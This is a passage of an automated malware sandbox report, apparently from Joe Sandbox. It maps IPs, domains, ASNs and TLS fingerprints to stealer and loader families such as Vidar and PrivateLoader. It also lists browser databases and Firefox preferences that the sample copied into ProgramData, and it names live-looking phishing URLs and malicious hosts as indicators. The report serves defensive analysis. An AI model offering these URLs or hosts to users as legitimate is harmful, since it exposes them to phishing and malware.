                                                                                                                                                                                      12:47:01API Interceptor1x Sleep call for process: RegAsm.exe modified

                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                      IPs

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      23.195.238.96file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                        bRlvBJEl6T.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          cXwjp02Fln.exeGet hashmaliciousDCRat, VidarBrowse
                                                                                                                                                                                            https://gtm.steamproxy.vip/market/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              https://mail.thesteampowered.help/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                https://163buffmarket.com/market-authGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  ZmRmzH1sT2.exeGet hashmaliciousMystic StealerBrowse
                                                                                                                                                                                                    8Mo5mJpITY.exeGet hashmaliciousGlupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                      DKbuSJgbEn.exeGet hashmaliciousGlupteba, Mystic Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                        x2ltSf5I5A.exeGet hashmaliciousGlupteba, Mystic Stealer, RedLine, SmokeLoader, Stealc, zgRATBrowse
                                                                                                                                                                                                          65.109.242.112file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                              ouTBFyJGN3.exeGet hashmaliciousDjvu, PrivateLoader, VidarBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        steamcommunity.comfile.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 104.105.90.131
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 23.7.115.52
                                                                                                                                                                                                                        ouTBFyJGN3.exeGet hashmaliciousDjvu, PrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 23.210.138.105
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 23.66.133.162
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 104.119.64.169
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        bRlvBJEl6T.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        cXwjp02Fln.exeGet hashmaliciousDCRat, VidarBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.3763.25878.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 23.198.107.192
                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 104.105.90.131

                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        ALABANZA-BALTUSfile.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        ouTBFyJGN3.exeGet hashmaliciousDjvu, PrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                                                                                                                                                                        • 65.108.69.93
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        bRlvBJEl6T.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 65.108.152.56
                                                                                                                                                                                                                        cXwjp02Fln.exeGet hashmaliciousDCRat, VidarBrowse
                                                                                                                                                                                                                        • 65.108.152.56
                                                                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.3763.25878.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 65.108.152.56
                                                                                                                                                                                                                        AKAMAI-ASUSjew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.38.185.4
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 104.105.90.131
                                                                                                                                                                                                                        https://southwest.app.link/3p?$3p=e_adobe_campaign_classic&$original_url=https%3A%2F%2Fsouthwest.com%3F%24deep_link%3Dtrue%26~campaign%3Dac_sec_promo_20230615_sale_wow%26clk%3DSECTEMPLATELOGO%26%24fallback_url%3Dhttps://firefliesops.web.appGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 23.54.42.39
                                                                                                                                                                                                                        http://pub.marq.com/34a28a00-9c6a-43a5-9e9d-e8027b355f51Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.220.246.175
                                                                                                                                                                                                                        https://symless.com/synergy/synergy/api/download/synergy-win_x64-v3.0.79.1-rc3.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.54.42.93
                                                                                                                                                                                                                        ouTBFyJGN3.exeGet hashmaliciousDjvu, PrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 23.210.138.105
                                                                                                                                                                                                                        https://url.uk.m.mimecastprotect.com/s/NP8rC2xx9FAQq7nsn7CnD?domain=netorg5340145-my.sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 184.25.119.149
                                                                                                                                                                                                                        gJ8ggFmFab.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                        • 184.31.203.188
                                                                                                                                                                                                                        https://urlz.fr/qBEkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.194.167.245
                                                                                                                                                                                                                        cert.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.122.44.67

                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        ouTBFyJGN3.exeGet hashmaliciousDjvu, PrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        X1Y8cXHs72.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        0dN59ZIkEM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 65.109.242.112
                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        YN9hIXWLJ3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        SecuriteInfo.com.FileRepMalware.16991.21545.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        Form_W-9_Ver-083_030913350-67084228u8857-460102.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        MSI.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        upfilles.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        7Tat3LP3VY.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        2R78NbtrsM.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        europefridayedatingloverforchildern.jpg.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 23.195.238.96

                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        C:\ProgramData\BGDAAKJJDAAK\mozglue.dll1WQoGZnpTG.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                              Mh578aJbfT.exeGet hashmaliciousMars Stealer, PrivateLoader, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                ouTBFyJGN3.exeGet hashmaliciousDjvu, PrivateLoader, VidarBrowse
                                                                                                                                                                                                                                  WS89wB6DGK.exeGet hashmaliciousMars Stealer, PrivateLoader, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                    0d4n5OS22R.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                      TCBNakHd95.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                        v5jT7owmfn.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                          rI4M7XBuY3.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                            C:\ProgramData\BGDAAKJJDAAK\freebl3.dll1WQoGZnpTG.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                                                                                                                                                  Mh578aJbfT.exeGet hashmaliciousMars Stealer, PrivateLoader, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                    ouTBFyJGN3.exeGet hashmaliciousDjvu, PrivateLoader, VidarBrowse
                                                                                                                                                                                                                                                      WS89wB6DGK.exeGet hashmaliciousMars Stealer, PrivateLoader, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                        0d4n5OS22R.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          TCBNakHd95.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            v5jT7owmfn.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              rI4M7XBuY3.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\AEHIEC

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\AEHIEC-shm

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\BGDAAK

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\EBAFBG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\ECFHCG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\FCFIJE

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\FCFIJE-shm

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\FIDAFC

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\GHCGDA

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9571
                                                                                                                                                                                                                                                                Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                                MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                                SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                                SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                                SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\IDBKKK

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\IIEBAF

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
